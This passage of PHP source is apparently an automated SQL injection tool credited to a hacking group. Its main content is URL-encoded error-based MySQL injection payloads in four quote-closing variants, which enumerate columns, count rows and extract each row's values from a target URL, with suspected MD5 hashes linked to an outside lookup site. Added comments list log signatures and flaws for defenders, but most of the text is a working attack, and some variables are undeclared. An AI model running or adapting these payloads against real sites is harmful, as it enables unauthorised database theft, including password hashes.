            @$_column = "%27%29%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    }elseif($mode_eb == 3){
            @$_column = "%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    }elseif($mode_eb == 4){
            @$_column = "%29%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    }
   
   
   
   
   
    $nums_columna = "$url+$_column";
    $n_tcolum = file_get_contents("$nums_columna");
    $num2 = GetBetween($n_tcolum);
    echo "<option value=\"$num2\">$num2</option>";
    $i++;
    endwhile;
    echo "</select>";
    echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>";
    echo "<input type=\"submit\" name=\"datas\" id=\"datas\" value=\"data\"/>";
    echo "<form>";

   
}

    }
/**
 * Frame 4: row extraction stage for the column chosen in frame 3.
 *
 * Reads the URL, column name ("num2"), table name ("dz") and mode ("lol") from the POST
 * body, requests COUNT(*) of the table, then issues one request per row using LIMIT $i,1
 * and prints each returned value in an HTML table.
 *
 * Defensive notes:
 * - Log signature: the fixed numbers 7656 (count) and 6968 (rows) together with the
 *   ":oyu:" / ":phz:" hex markers and an incrementing LIMIT offset.
 * - Column and table names are placed into the outgoing query text exactly as posted.
 * - Values of exactly 32 characters are labelled "MD5" and linked to a third-party
 *   lookup site, i.e. extracted values may be sent on to an external service by the
 *   operator's browser.
 * - Values from the remote response ($num4) are echoed into the page unescaped.
 * - $databas, $start1 and $end2 are not declared in this function's scope;
 *   GetBetween() takes one parameter, so the extra arguments are ignored.
 */
function frame4(){
    html_header();
   
if(isset($_POST['datas']) && $_POST['datas']=='data')
{
    $url = $_POST["url"];
    $num3 = $_POST["num2"];
    $dz = $_POST["dz"];
   
    $mode_eb = $_POST["lol"];

// Row-count request, one variant per context-closing mode.
if($mode_eb==1){
 @$datas = "$url+%27%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
}elseif($mode_eb==2){
 @$datas = "$url+%27%29%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
}elseif($mode_eb==3){
 @$datas = "$url+%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
}elseif($mode_eb==4){
@$datas = "$url+%29%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
}


@$dato = @file_get_contents("$datas");


    $i = -1;
   
    echo "<table>";
   
    // One request per row, bounded by the count extracted from the first response.
    while ($i <= (GetBetween($dato)-1)):
            if($mode_eb == 1){
    @$_data = "%27%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    }elseif($mode_eb == 2){
                 
            @$_data = "%27%29%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    }elseif($mode_eb == 3){
            @$_data = "%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    }elseif($mode_eb == 4){
            @$_data = "%29%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    }
       
    $datas2 = "$url+$_data";
    $data2 = file_get_contents("$datas2");
    $num4 = GetBetween($data2);
    // A 32-character value is assumed to be an MD5 hash and gets a lookup link.
    if(strlen($num4) == 32){
    echo "<tr><td>$num4</td><td><div OnClick=\"window.open('http://www.hashchecker.de/$num4')\" style=\"color: blue\">MD5</div></td></tr>";
    }else{
    echo "<tr><td>$num4</td><td>";
    }
    $i++;
    endwhile;
   
 //}

echo "</table>";
echo "<table border=0 width=400 align=center><tr><Td><center><p style='font-size: 10pt;'>";
echo "<b>&copy; AZZATSSINS CYBERSERKERS</br></b></td></tr>";
echo "</center>";
}
}
  459.  
  460.  
  461. ?>